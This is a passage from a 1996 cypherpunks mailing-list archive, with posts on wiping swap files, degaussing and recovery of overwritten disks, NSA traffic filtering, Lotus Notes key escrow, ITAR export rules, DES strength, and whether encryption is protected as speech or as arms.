have, without violation of the International Trafficking in Armaments
Regulations," stated Mr. Weinstein, "and will be made available to anyone
free of charge who appears at our Mountain View offices with a U.S. pass-
port, a birth certificate, a valid driver's license, two credit cards,
and his or her Social Security Number tattooed on their upper left forearm."
Alex de Joode announced that the kit had been available for the past week
on ftp.hacktic.nl as /pub/linux/crypto/up.your.netscape.

Lucky Green, spokesperson for the Mark Twain Bank, today announced the
first truly anonymous 10 cents off coupon for the Internet.

Attila was detained for 72 hours at the Swiss border while customs 
officials determined that an egg salad sandwich found in his luggage was
indeed made of chicken eggs and was not harboring any biological weapons
or contagious neurotoxins.

Reliable sources reported today that the NSA has purchased a




        absolutely no intention of engaging in domestic surveillance
or censorship."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 21 Jan 1996 15:38:15 +0800
To: cypherpunks@toad.com
Subject: Wipe Swap File
Message-ID: <199601201421.JAA01170@pipe10.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 19, 1996 23:59:46, 'anonymous-remailer@shell.portal.com' wrote: 
 
 
>I know this is a little off-topic, but does anyone know of a good swap
file  
>deleter?  I know Real Delete is a good program, but I want something I can
call  
>in a batch file after windows to automatically do a secure wipe of the  
>permanent swap file and then replace it.  I have heard of a couple
programs but  
>I am not sure about their reliability.  Any pointers to a good program
would be  
>appreciated. 
> 
 
One way: 
 
1) Go to DOS prompt; 
2) Change mode of the permanent swap file to make it writable; 
3) Run WIPEFILE by Norton, or any other similar program, without setting up
the file for deletion after wiping; 
4) Change mode of the permanent swap file back to the original attributes; 
5) Leave DOS prompt. 
 
Another way: 
 
1) Remove permanent character of swap file from within Windows; 
2) Go to DOS prompt. 
3) Erase the swap file. 
4) Run Norton etc. WIPEDISK utility on all areas of disk not used by files;

5) Return to WIndows; 
6) Rebuild permanent swap file. 
 
Remember that one simple wipe is *not* secure. Current Department of
Defense security regs call for wiping the same space something like 8 or 9
times. Even then the wipe is not secure enough for higher level DofD
classified material. There the regs call for the physical destruction of
the medium after it has been wiped. 
 
Norton handles DoD-level wipes as an option. 
 
 
-- 
     tallpaul 
     What part of "know" don't you understand?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 21 Jan 1996 09:46:57 +0800
To: cypherpunks@toad.com
Subject: Re: NSA vacuuming down Internet traffic
Message-ID: <199601201448.JAA03919@pipe10.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 20, 1996 04:05:50, 'Tatu Ylonen <ylo@cs.hut.fi>' wrote: 
 
 
>As for the keyword search problem, it would easily be possible to scan 
>much of the data (say, tcp ports smtp, nntp, login, exec, ident) in 
>real time against a million-phrase dictionary (containing keywords, 
>e-mail addresses, names, abbreviations, etc.).  If there are 
>performance problems, you can first limit by 
>source/destination/protocol/port.  Only intercepts (e.g., entire tcp 
>connections) that pass this initial screening are passed on to other 
>machines for more complicated analysis. 
> 
>Note also that many parts of the filtering problem parallelize quite 
>nicely. 
 
Or simply pipeline it. 
 
Bare bones Pentium systems go for under $US 1,000 (quantity one) on the
open market. Buy them in quantity and a private company can set up a
thousand Pentium pipeline for under a million dollars. Easily affordable
for even medium-sized corporations. 
-- 
tallpaul 
 
"To understand the probable outcome of the Libertarian vision, see any
cyberpunk B movie wherein thousands of diseased, desparate and starving
families sit around on ratty old couches on the streets watching television
while rich megalomaniacs appropriate their body parts for their personal
physical immortality." 
     R. U. Sirius 
     _The Real Cyberpunk Fakebook_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 21 Jan 1996 10:32:02 +0800
To: trei@process.com
Subject: Re: Hack Lotus?
In-Reply-To: <9601200326.AA09366@toad.com>
Message-ID: <199601201509.KAA02967@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter Trei" writes:
> Think it through. 
[...]
> 8 Bob's copy of lotus repeats steps 4 & 5 above, and checks if
>    it's version of Epe(K') matches the one sent. 

Hmm, it could, but it isn't going to be trivial unless the thing is
running straight RSA without a random pad.

If it isn't randomly padding, then it possible to make a table of the
2^24 possible encryptions and break traffic without knowing the RSA
key the government uses. It would require about 16GB of storage,
granted, but that isn't exactly impossible in todays world -- that
only costs about $4000. It would also require a lot of CPU, but not an
impossible amount and the investment would be one time. Given such a
table properly indexed, you could crack any passing key just by
indexing to find out three bytes of the 64 bit key and then go after
the other 40 in fairly short order. That would make a new "Hack IBM"
(Lotus is owned by them) promotion on C2 rather fun!

If they are randomly padding, then they would have to send the pad
along, presumably encrypted under the RC4 key or under Bob's RSA key.

Someone has to deconstruct the code. At this point, we are starting to
fly off into the world of speculation.

> > Of course, I'll point out that 64 bit RC4 keys are still not
> > particularly heartwarming...
> 
> Granted, but we don't know if they use RC4, DES, or what.

They are RC4 if they haven't changed that part of the design.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 20 Jan 1996 23:54:19 +0800
To: Phil Karn <karn@unix.ka9q.ampr.org>
Subject: Re: ITAR and hash functions (Perry's question)
In-Reply-To: <199601201124.DAA09482@unix.ka9q.ampr.org>
Message-ID: <199601201534.KAA03043@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karn writes:
> Perry quoted part of the joint declaration of facts in my case and asked
> 
> >Would this not mean that the government is estopped from ever again
> >claiming that hash functions are export controlled under the ITAR?
> 
> Not according to them.

Yeah, I know not according to them. Thats not what counts. I'd like to
know what a lawyer thinks. Once they have declared that something
doesn't fit the munitions criteria I suspect they are estopped from
ever claiming again that it is munitions -- basic legal
principle. Sure, they can claim otherwise, but they aren't forbidden
by law from asserting their power to make buildings levitate, either.

> Furthermore, they repeatedly assert that under the power delegated to
> them by the President, they have the absolute power to add and delete
> items from the Munitions List and to make inexplicable, inconsistent
> and arbitrary rulings whenever they damn well feel like it, and no
> court can overrule them.

They can claim that they have the right to declare fingernail clippers
to be munitions, but that certainly couldn't stand up in court.

> So the bottom line is this: at the moment the ODTC will let you export
> hash functions as long as they don't encrypt data. They'll probably
> grant CJ requests to that effect. But they could change their minds at
> any time if they feel like it.
> 
> Isn't it wonderful to live under a government of laws, not of men?

Joy.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 21 Jan 1996 00:14:31 +0800
To: cypherpunks@toad.com
Subject: Re: Wipe Swap File
In-Reply-To: <199601201421.JAA01170@pipe10.nyc.pipeline.com>
Message-ID: <8me1HD60w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tallpaul@pipeline.com (tallpaul) writes:
> Remember that one simple wipe is *not* secure. Current Department of
> Defense security regs call for wiping the same space something like 8 or 9
> times. Even then the wipe is not secure enough for higher level DofD
> classified material. There the regs call for the physical destruction of
> the medium after it has been wiped.

Degaussing the media (running a household magnet over it :-) may be an option.
Two semi-on-topic questions:

1. Does anyone know a cheap way to recover the traces of the previous
(overwritten) recordings on the media?

2. If a cheap way exists, has anyone considered stego use of it?

(I don't need this right now, just for future reference, and any such
discussion would improve the s/n on this list.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sat, 20 Jan 1996 23:58:48 +0800
To: pfarrell@netcom.com
Subject: DC area cypherpunks physical meeting, January 27
Message-ID: <38432.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The next DC-area cypherpunks meeting will be Satyurday, January 27
at Digex Headquarters offices in Greenbelt MD from 3PM until 6PM.

There was talk of obtaining a cypherpunk-related video to show as a social
event after the meeting. More on that as details become available.

For more information, agenda, directions, etc. see URL:
http://www.isse.gmu.edu/~pfarrell/dccp/index.html

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 21 Jan 1996 02:32:28 +0800
To: cypherpunks@toad.com
Subject: Re: Wipe Swap File
Message-ID: <ad266bbe08021004727d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:38 PM 1/20/96, Dr. Dimitri Vulis wrote:
>tallpaul@pipeline.com (tallpaul) writes:
>> Remember that one simple wipe is *not* secure. Current Department of
>> Defense security regs call for wiping the same space something like 8 or 9
>> times. Even then the wipe is not secure enough for higher level DofD
>> classified material. There the regs call for the physical destruction of
>> the medium after it has been wiped.
>
>Degaussing the media (running a household magnet over it :-) may be an option.

Ordinary household magnets fail for a couple of reasons:

1. Their field strength is not high enough to affect modern media, due to
the extremely high coercivity of modern media. (Try it out, you'll be
surprised at hard it is to really change a lot of bits with a household
magnet.)

2. Most "swap files," as used above, are of course on hard drives. Encased
in metal. In any case, the nearest a household magnet can get to the
surface is several centimeters. Unless the magnet is very large (such as
the 20-pounder I have from my childhood days), the field strength will drop
drastically in several centimeters.

(Modern disk drives, and even modern videotape machines, use very
high-coercivity coatings, including pure metal, and the heads must ride
very close to the media to flip the domains. A magnet several centimeters
away is effectively at infinity.)

3. A time-varying field is preferred. Bulk erasers work this way, by
plugging into an a.c. socket and generating a time-varying field. And even
these are getting harder to use to erase video tapes, for example, due to
the high coercivity of modern media. Most folks I know no longer even try
to bulk erase tapes.

>1. Does anyone know a cheap way to recover the traces of the previous
>(overwritten) recordings on the media?

There are custom drives for various media which have multiple heads, and
heads that can be "jogged" a little bit. This allows, I have read, the
subtle variations of multiple writes to be extracted.

Much more expensive would be various electron microscope-based imaging
methods to directly image the domains and extract subtle signs of past
write cycles.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 21 Jan 1996 00:42:10 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: DES in real life
Message-ID: <Pine.SUN.3.91.960120111743.16171F-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Recognizing that DES is not the best thing out there, but that it is
better than RC40 and life is a series of cost/benefit tradeoffs and that
there is a large installed base to interoperate with, I'd like your
opinions on the following: 

1) Suppose you are approached by a corporate client who believes that they
can get export permission for DES (but nothing stronger, i.e. no 3DES). 
What kind of real-world, non-banking, applications is DES just too weak
for today?  In answering keep in mind that most US corporate clients are
not too worried about the US government reading their email.  Some do
worry about foreign governments and many worry about competitors. [I've 
limited this to "non-banking" because banks seem to be gearing up for 3DES.]

2) How long before DES becomes generally unsuitable for (A) corporate 
(B) personal use [please keep the threat model on which this question is 
based in mind -- threats *other than* the US government wiretapping you]?

3) Do you have a view as to whether DES (A) will and (B) should be 
recertified next time the issue arises?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 20 Jan 1996 19:38:26 +0800
To: cypherpunks@toad.com
Subject: RE: Cypherpunk Enquirer
Message-ID: <Pine.BSD.3.91.960120112303.6568A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



	OK, who's the 'wise guy' among us?

	is it the aging hippy in a hot top?

	is it Samuel Clemmons revenge?

    who cares?  write on!

	as blanc might have said:

    Hee-hee-hee-haa-haa-haaaaaaa. 
    The UpOurs CPunk News Update.
          ^
__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....

---------- Forwarded message ----------
Date: Fri, 19 Jan 1996 20:41:31 -0800
From: blanc <blancw@accessone.com>
To: "cypherpunks@toad.com" <cypherpunks@toad.com>
Subject: RE: Cypherpunk Enquirer

Hee-hee-hee-haa-haa-haaaaaaa.   
The UpYours CPunk News Update.

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 21 Jan 1996 02:26:22 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption and the 2nd Amendment
Message-ID: <ad266ee7090210043077@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:39 PM 1/20/96, Michael Froomkin wrote:
>IMHO the 2nd amendment argument is bunk. [I haven't seen the Wired
>article BTW, so this is just a general point.]

I haven't seen the "Wired" article either, as I no longer read it.

I agree with Michael that an association of crypto with arms is a long
reach, unsupported in anything I've seen in the Constitution or related
papers. Moreover, any successful link made could be disastrous.

After all, it is well-established--whether we like it or not--that the
government can regulate and control access to hydrogen bombs, bazookas,
nerve gases, grenades, fully-automatic weapons, and even various kinds of
rifles and handguns. I would hate to see crypto truly classified as an
armament (beyond what the ITARs say) and thus be subject to the same kinds
of regulations as above.

Be careful what you wish for, you might get it.

A much stronger claim can be made, I think, that crypto is a form of
language or speech, clearly protected by the First Amendment. Thus, writing
one's diary in an encrypted form (a common practice in colonial days,
interestingly) is a form of language one uses. Thus, "Congress shall make
no law..." about this speech or writing. That two people choose to converse
in ROT-13 or in RSA or in their own private code is not something the
government is authorized to interfere with.

Ikewiselay, itingwray inlay igpay atinlay islay otectedpray.

--Imtay Aymay

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 21 Jan 1996 00:52:29 +0800
To: RjasonC@eworld.com
Subject: Re: Encryption and the 2nd Amendment
In-Reply-To: <960119164917_22857929@hp1.online.apple.com>
Message-ID: <Pine.SUN.3.91.960120113035.16171G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


IMHO the 2nd amendment argument is bunk. [I haven't seen the Wired 
article BTW, so this is just a general point.]

The definition of crypto as arms was accomplished as an administrative
convenience by an agency of the US govt.  It is not a definition of
constitutional significance.  To oversimplify only a little bit, agencies
don't get to define terms in the constitution -- and a good thing too, or
they might try to define e.g. "speech" in some funny way. 

The issue is whether under any fair reading of the 2nd Am. you can read
"arms" to include encryption.  You might try to do this by "original
intent" (except that I've never seen a shred of evidence for this).  Or
you might try to do it by arguing that the meaning of the term "arms"
should change with the times and crypto fits the purposes (defending your
home?) of the amendment.  But this is a very tough argument to make, and
I've never seen anyone try it.  I suspect it is also bound to fail; indeed
any interpretive system that would stretch the constitutional use of the
word "arms" so wide as to fit crypto could equally well be used to exclude
anything more advanced than muskets and early rifles... which probably 
explains why I know of no such arguments either.

I must be posting some version of this every nine months or so.  Each time I 
get hate mail.  Let's make this an exception shall we?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 20 Jan 1996 16:40:09 +0800
To: cypherpunks@toad.com
Subject: Re: authenticating intrahost crypto providers
Message-ID: <199601200830.AAA07615@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 AM 1/18/96 EST, James Leppek wrote:
>
> I have been doing some research on the development of an abstract
> security services API(not just a CAPI) and have hit a road block. 
> The problem revolves around the need to authenticate a 
> security service provider to an application.

No such need.

If the attacker can introduce his own module to supply crypto services
then he must have administrator (NT equivalent of root) privileges,
in which case your are stuffed regardless.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 21 Jan 1996 12:57:45 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: "cybertage"
In-Reply-To: <199601191846.MAA12766@proust.suba.com>
Message-ID: <199601202037.MAA01384@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



From: Alex Strasheim <cp@proust.suba.com>
>> how about a new term for all the various enemies of cyberspatial 
>> advancement?
>
>I think this is a bad idea.  We should be moving away from demonization, 
>not towards it.  

well, around the turn of the century, Luddites were smashing looms with
hammers. we have not quite reached that stage, but the negativity, 
hyperbole, and paranoia sown by "cyberteurs" engaging in "cybertage"
has a similar effect, and may eventually turn into the same form.

by "demonization" I tend to imagine that this means one insists the
evil soul must get no sympathy, compassion, or help. quite the opposite
I believe with "cyberteurs"-- they just need a little education to
lose their own antagonism. 

I am no way advocating a holy war; only suggesting
that we try to create a STIGMA with the position that there is something
evil about cyberspace, just as the opponents have already created a
STIGMA associated with cyberspace to some degree. 

there is already a
stigma associated with cyberteurs and cybertage-- I am only suggesting
that it be made more distinct through the terminology.

>We are right, and they are wrong.  The good thing about being right is
>that logic and the facts will bear us out.  Let's use rational arguments,
>not name calling.  Save the nasty names for another fight when you're
>wrong and the other guy is right.  

its a label. what is the difference between calling someone a "saboteur"
or a "cyberteur"? are you going to argue that the media etc. are *not*
sabotaging cyberspace through some of their more odious actions? to the
contrary, I see these terms as "reality checks".

your smugness and complacency is alarming. I agree that they hold the
losing position in *theory*, but reality is not about what is best
in theory. that which is best doesn't win out to an extensive PR
campaign, often. being "correct" is not enough in a world of people
who believe in incorrect philosophies; one must broadcast one's correctness
to the world, and terminology is heavily important in this endeavor.

>We should build a case to show that everyone -- including those who
>disagree with us -- will be better off if we win.  It's the truth, so we
>ought to be able to come up with good arguments.

I am all for this, while at the same time suggesting that "cybertage"
being sown by some demagogues is out of line. I am not proposing that
every opponent of some form of "cyberspace" be labelled a "cyberteur",
only the more radical ones, such as Exon etc.

>Unfettered access to strong crypto is in everyone's intrest.  It's good
>for business and it's good for civil liberties and freedom around the
>world.  These are not complicated things to grasp.  If we get our message
>out there, we will win.

a big part of getting a message out is terminology.

>Lotus has made a mistake.  Their gak plan won't reassure international
>customers, which is to say it won't do what they want it to do.  So why do
>it? Instead of calling them names, let's explain why it was a bad idea. 
>Let's try to explain to Lotus customers why it's a bad idea.  If we can do
>that, we'll get a response.

you seem to be awfully naive. from their perspective, the product may
become a rousing success, moving into areas they weren't able to penetrate
prior to their decision. why do you think they "made a mistake"? I doubt
any executive will think that even after a lot of attempted persuasion.

I'm all for your approaches. I wouldn't call Lotus a "cyberteur" engaging
in "cybertage". I would however talk about them in the following way:

"Lotus must be careful not to continue to pursue their course of action
or they may begin to bear the stigma of a cyberteur engaging in cybertage".

you see? I didn't actually *call* them anything. the stigma of the term
can be useful.

again, I am not in favor of holy wars. if something can be accomplished
through modest and minor means, by all means go for it. however in many
situations these means may have been exhausted and more shrill, guerrilla
tactics are required. I believe we are rapidly entering that realm this
moment with things like Digitial Telephony, Exon, NSA secret company
visits, etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Sun, 21 Jan 1996 02:56:14 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Encryption and the 2nd Amendment
In-Reply-To: <ad266ee7090210043077@[205.199.118.202]>
Message-ID: <199601201842.NAA02090@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> I agree with Michael that an association of crypto with arms is a long
> reach, unsupported in anything I've seen in the Constitution or related
> papers. Moreover, any successful link made could be disastrous.
> 
> After all, it is well-established--whether we like it or not--that the

It is?  Not by precedent, as far as I know.  By statute, yes.  I'd like 
to see some cites on this - the only reasonable cite that I know of 
concerning the ability of the government is the one back in the 40's (I 
think) that concerned someone possessing an "illegal shotgun" - and, of 
course, the pseudo-famous case regarding whether or not a convicted felon 
filling out certain government forms is protected by the 5th amendment.

Michael, can you point me in the general direction here?

> government can regulate and control access to hydrogen bombs, bazookas,
> nerve gases, grenades, fully-automatic weapons, and even various kinds of
> rifles and handguns. I would hate to see crypto truly classified as an
> armament (beyond what the ITARs say) and thus be subject to the same kinds
> of regulations as above.

> A much stronger claim can be made, I think, that crypto is a form of
> language or speech, clearly protected by the First Amendment. Thus, writing
> one's diary in an encrypted form (a common practice in colonial days,
> interestingly) is a form of language one uses. Thus, "Congress shall make
> no law..." about this speech or writing. That two people choose to converse
> in ROT-13 or in RSA or in their own private code is not something the
> government is authorized to interfere with.

Not *that's* a novel argument, one I hadn't heard before!  If true, this 
could cover a very wide variety of circumstances.  If I send my wife 
email from work and encrypt it, then that's the same as if I sent her a 
note in Farsi.  Interesting implications here... I wonder if there are 
any cases where, for example, the government took people to court during 
WWII to prevent them from talking in German or Japanese over the phone, 
or in letters?

> Ikewiselay, itingwray inlay igpay atinlay islay otectedpray.

I know you probably did this by hand, but I think in the dim mists of 
time, someone posted a program (to net.sources, no less!) that converts 
text into pig latin.  Of course, such a thing is almost trivial to write
but it would be interesting .

On the other hand, compression isn't illegal, but crypto is.  What's the 
difference?  Both render text in a form that is unreadable to the casual 
observer, and both require some effort on the part of the observer to 
"decrypt".
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 21 Jan 1996 21:30:14 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption and the 2nd Amendment
Message-ID: <ad2686d50b021004cfd9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



[A comment: I will _not_ be drawn into a general Second Amendment
discussion here, for several reasons. This note is only to respond to the
first comments I've seen on my post...if a lot more people get into the
act, I'll just let others fight it out and ignore the thread. Crypto = Guns
has been debated many times in many places. I won't debate gun control,
which I'm against, nor will I get into debates about how a ban on
biological warfare research would be unenforceable, would interfere with
bread-making and wine-making research, blah blah. This is a kind of
nit-picking that echoes the libertarian disease.]

At 7:23 PM 1/20/96, Alan Horowitz wrote:
>> After all, it is well-established--whether we like it or not--that the
>> government can regulate and control access to  [...]
>
>
>       I *think* the only thing that's been affirmed, is that the feds
>can *tax*  weapons transfers.     I think the one particular case is
>called "Rock Island" or something like that. The defendant was
>*acquitted* of possessing an un-registered machine gun, because the
>authority to tax transfers of newly-manufactured machine guns, no longer
>exists. This is an over-simplifaction. Anyway, the point is, the
>defendant was acquitted right there in district court.

And what about the Assault Weapons laws? Bush signed one, limiting
transfers of certain types of assault rifles, assault pistols, etc. (their
choice of terms, not mine). Without getting into specifics of which models
were banned for import and banned for transfer to private parties, this is
a very real law. Taxes have almost nothing to do with it.

That some defendants were acquitted in some jurisdictions on some charges
says little about the more general laws.

Likewise, there are specific laws on the books banning the private
possession of chemical and biological warfare agents. (This was discussed
on the list a couple of years ago--a specific law was passed outlawing
private research into biological warfare agents unless authorized to do so
by the governemnt.)

Without spending a lot of time searching for the specific laws, I recall
that the Atomic Energy Act placed stringent restrictions on the
dissemination of nuclear materials. One can argue that these laws are not
"weapons" laws per se, but the effect is the same.

Anyone possessing a nuclear warhead in the U.S. would be subject to many
laws, ranging from national security laws to public endangerment laws to
hazardous materials laws.

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 21 Jan 1996 23:44:19 +0800
To: cypherpunks@toad.com
Subject: Re: Wipe delete
Message-ID: <199601201840.NAA05671@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 20, 1996 10:24:34, 'sheol@downdeep.com' wrote: 
 
 
>How can data be recovered after it has been wipe by being  
>overwritten? You say even 8 or 9 times is not secure? That's kind of  
>scary. 
> 
 
Let me "answer" this and another post first by saying, re the tekkie stuff,
"I do not know." 
 
However, my non-technical understanding goes something like this: 
 
Reading and writing/erasing from a disk platter are pure only in the
abstract. A bit interpreted as a 1 or 0 has a certain level of magnetism
that the software accepts as defining it as a 1 or 0. The level of defined
magnteism is never 100% on the specification; it always varies a little.
How much it varies can be read by different grades of hardware. 
 
Think of a simple erasure of data that has been written once and erased
once. The different patterns of writing will have slightly different
values. These can be read with specialized hardware and the raw data
analyzed with special software programs. 
 
Is there a cheap way that *we* can do such things? I do not think so. 
 
The normal read/write head(s) on our normal hard disks have a limited
sensitivity, fine for normal read/write operations but not sensitive enough
the gather the minute variations described above. 
 
Doing a military grade analysis of heavily overwritten data involves, to my
knowledge, first opening the disk drive, removing the platters, inserting
the platters in a second drive with much more sensitive heads, initializing
the new drive to make sure that the extra-sensitive heads can locate the
proper tracks/sectors etc. on the old platter, and then gathering the data.
That is, the first steps in the process are hardware, not software, steps. 
 
Now one way to increse the sensitivity of a read/write head is to run it
closer to the physical media on which the magnetic signal resides. In other
words, the intensity of magnetic flux decreases as a function of distance;
get closer to the source and you can read weaker signals. 
 
This also means that, as you postion a new read/write head closer to the
platters you significantly increase the likelihood that it will physically
crash into the platter itself with the data intensity of an army tank
running over a stack of bowling pins. 
 
This, in turn means that the new combination of extra-sensitive read/write
head and old disk platter is especially sensitive to contaminates.
(Forgetting the width of the gap in the head which is another way of
increasing sensitivity), the level of contamination like smoke particles,
dust, etc. must be less than that called for in the original factory
specifications. 
 
This, I think, means you need a physical "clean room" to perform the
reassembly that is cleaner than that used by the original factory. 
 
Those aren't cheap and that is (one) reason why there isn't a cheap way for
us to do this. 
 
At least some aspects of this service is commercially available today. One
easy way to locate services is to look at the small ads in the back of _PC
Magaxine_. 
 
You might try Vogon USA. voice is 405-321-2485. fax is 405-321-2741. 
 
They have no WWW page or even e-mail address because they are not on the
net. I don't even think they permit modems on their factory site. I spoke
to Bob Emerson, Vogon's Service Manager, about this. He explained it as a
security matter: you don't get hacked over the net if you aren't on the
net; you don't get penetrated over the phone lines if you don't have modems
in your shop. 
 
Sorry for the excessively broad non-technical character of this post. I'm
sure other people on the list can go into the privacy issue of data
recovery in far greater detail while ROFLTAO at my low level of knowledge. 
 
tallpaul 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Jan 1996 12:47:46 +0800
To: cypherpunks@toad.com
Subject: Re: Wipe Swap File
Message-ID: <m0tdlVU-00091MC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:38 AM 1/20/96 EST, Dr. Dimitri Vulis wrote:
>tallpaul@pipeline.com (tallpaul) writes:
>> Remember that one simple wipe is *not* secure. Current Department of
>> Defense security regs call for wiping the same space something like 8 or 9
>> times. Even then the wipe is not secure enough for higher level DofD
>> classified material. There the regs call for the physical destruction of
>> the medium after it has been wiped.
>
>Degaussing the media (running a household magnet over it :-) may be an option.

Degaussing using a common, AC-driven bulk tape eraser is FAR FAR FAR better 
than using a permanent magnet.  DO NOT USE A 'HOUSEHOLD MAGNET"!!!!  (Except 
in an absolute dire emergency, such as when the government thugs are 
breaking down the door, and you have to wipe that disk in a second, and 
didn't think to keep the bulk eraser plugged in and immediately available, 
etc.  Even then, use a Neodymium Iron Boron magnet, because floppies are 
actually remarkably insensitive to demagnetization...)

Here is why:  Magnetic materials have "hysteresis curves."  If you merely 
apply a "DC" magnetic field to a floppy disk, this orients "all" the domains 
in one direction, but perhaps with a small residual bias based on the 
previously-magnetized direction.  Such data won't be readable on an ordinary 
floppy drive, of course, but it might be recovered, with substantial (read, 
"money") effort.  This gives uninformed people a false sense of security.

AC-powered tape demagnetizers, on the other hand, produce a 60-hertz
(actually, 120 
